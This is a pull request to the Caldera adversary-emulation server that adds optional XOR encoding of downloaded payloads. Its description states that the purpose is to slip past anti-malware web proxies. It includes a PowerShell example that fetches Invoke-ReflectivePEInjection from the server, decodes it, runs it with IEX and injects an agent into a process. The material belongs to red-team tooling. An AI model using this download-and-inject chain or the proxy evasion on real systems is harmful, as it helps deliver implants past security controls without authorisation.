### PR TITLE
Add support for optionally encrypting downloaded data

### DIFF
--- a/app/service/file_svc.py
+++ b/app/service/file_svc.py
@@ -8,7 +8,7 @@ from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
 from cryptography.hazmat.backends import default_backend
 
 from app.utility.base_service import BaseService
-from app.utility.payload_encoder import xor_file
+from app.utility.payload_encoder import xor_file, xor_bytes
 
 
 FILE_ENCRYPTION_FLAG = '%encrypted%'
@@ -38,6 +38,9 @@ class FileSvc(BaseService):
         if payload in self.special_payloads:
             payload, display_name = await self.special_payloads[payload](request)
         file_path, contents = await self.read_file(payload)
+        if request.headers.get('xor_key'):
+            xor_key = request.headers['xor_key']
+            contents = xor_bytes(contents, xor_key.encode())
         if request.get('name'):
             display_name = request.get('name')
         return file_path, contents, display_name


### PR DESCRIPTION
Add support for optionally encrypting downloaded payload data using a simple XOR
cipher to enable bypassing anti-malware web proxies.

This is especially useful for the initial compromise using the process injection attack vector to accomplish beacon execution.  Caldera supports using the Invoke-ReflectivePEInjection PowerShell cmdlet for this purpose, but downloading this module from the Caldera server is often caught by anti-malware web proxies.  This code update adds support for specifying an XOR key when requesting a  payload  from the Caldera server.

An example of how this is used in PowerShell is provided below:
```
$url="http://my-caldera-server/file/download"; 
$wc1 = New-Object System.net.webclient; 

# Download sandcat agent 
$PEbytes = ....

# generate random ascii XOR cipher key
$key = -join ((33..90) + (97..122) | Get-Random -Count 10 | % {[char]$_}); 
$wc1.Headers.add("xor_key", $key); 
$wc1.headers.add("file","Invoke-ReflectivePEInjection.ps1"); 
$data = $wc1.DownloadData($url); 
# decrypt the XOR-encrypted payload
for ($i = 0; $i -lt $data.Length; $i++) { $data[$i] = $data[$i] -bxor $key[$i % $key.Length];} 
$data = [System.Text.Encoding]::UTF8.GetString($data); 

IEX ($data); 
Invoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId
```

Please review @wbooth @privateducky 